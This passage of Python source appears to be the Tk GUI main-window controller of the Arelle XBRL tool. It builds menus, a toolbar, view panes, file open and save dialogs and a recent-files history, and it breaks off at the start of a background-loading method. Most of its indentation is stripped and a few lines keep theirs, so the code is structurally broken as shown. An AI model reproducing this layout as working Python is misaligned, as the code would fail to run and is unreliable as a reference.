from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
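    """Main window controller for Arelle's interactive (Tk/ttk) GUI mode.
    Builds the menu bar, toolbar, paned view notebooks and message log, and
    dispatches long-running work to background threads that report back
    through a UI-thread queue.
    """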
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
        if self.isMac: # Mac Python fonts render larger than in other apps (Terminal, TextEdit, Word) and than Arelle on Windows
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
self.iconImage = PhotoImage(file=imgpath + "arelle.gif") # must keep reference during life of window
parent.tk.call('wm', 'iconphoto', parent._w, self.iconImage)
#parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
(_("Reopen"), self.fileReopen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                if shortcut:
                    self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",True)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateDedupCalcs = self.config.setdefault("validateDedupCalcs",False)
self.validateDedupCalcs = BooleanVar(value=self.modelManager.validateDedupCalcs)
self.validateDedupCalcs.trace("w", self.setValidateDedupCalcs)
validateMenu.add_checkbutton(label=_("De-duplicate calculations"), underline=0, variable=self.validateDedupCalcs, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.noCertificateCheck = self.config.setdefault("noCertificateCheck",False) # resets proxy handler stack if true
self.noCertificateCheck = BooleanVar(value=self.webCache.noCertificateCheck)
self.noCertificateCheck.trace("w", self.setNoCertificateCheck)
cacheMenu.add_checkbutton(label=_("No certificate check"), underline=0, variable=self.noCertificateCheck, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                if shortcut:
                    self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
            pluginMenuExtender(self, helpMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarReopen.gif", self.fileReopen, _("Reopen"), _("Reopen last opened XBRL file or testcase(s)")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
            priorGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",
                                     self.config.get('windowGeometry', ''))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
                        if h < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
# load argv overrides for modelManager options
lastArg = None
for arg in sys.argv:
if not arg: continue
if lastArg == "--skipLoading": # skip loading matching files (list of unix patterns)
self.modelManager.skipLoading = re.compile('|'.join(fnmatch.translate(f) for f in arg.split('|')))
elif arg == "--skipDTS": # skip DTS loading, discovery, etc
self.modelManager.skipDTS = True
lastArg = arg
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
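        # Track the view object behind the newly selected notebook tab so that
        # save/validate actions operate on the currently visible view.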
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: (packageInfo.get("name",""),packageInfo.get("version",""))),
start=1):
name = packageInfo.get("name", "package{}".format(i))
version = packageInfo.get("version")
if version:
name = "{} ({})".format(name, version)
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def okayToContinue(self):
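        # True when it is safe to discard the current instance: either nothing
        # is dirty/modified or the user confirms discarding unsaved changes.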
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XLSX file"), "*.xlsx"),(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".xlsx")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
elif isinstance(view, ViewWinFactList.ViewFactList):
ViewFileFactList.viewFacts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
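        # Maintain a most-recently-used list of at most 10 entries under
        # "fileHistory" or "importHistory" in the config, then rebuild the
        # File menu cascades and persist the config.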
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
                filename = xbrlLoadedMethod(self, filename) # runs in GUI thread; may map the filename and must return the (possibly mapped) filename
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive:
if not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filesource.basefile and not isHttpUrl(filesource.basefile):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl)
filesource.loadTaxonomyPackageMappings() # if a package, load mappings if not loaded yet
if filename:
if not isinstance(filename, (dict, list)): # json objects
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
elif len(filename) == 1:
self.updateFileHistory(filename[0], importToDTS)
            threading.Thread(target=self.backgroundLoadXbrl,
                             args=(filesource, importToDTS, selectTopView),
                             daemon=True).start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
                url = xbrlLoadedMethod(self, url) # runs in GUI thread; may map the url and must return the (possibly mapped) url
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
            threading.Thread(target=self.backgroundLoadXbrl,
                             args=(filesource, False, False),
                             daemon=True).start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
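        # Runs on a worker thread; on success, view construction is handed
        # back to the UI thread via self.uiThreadQueue (showLoadedXbrl).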
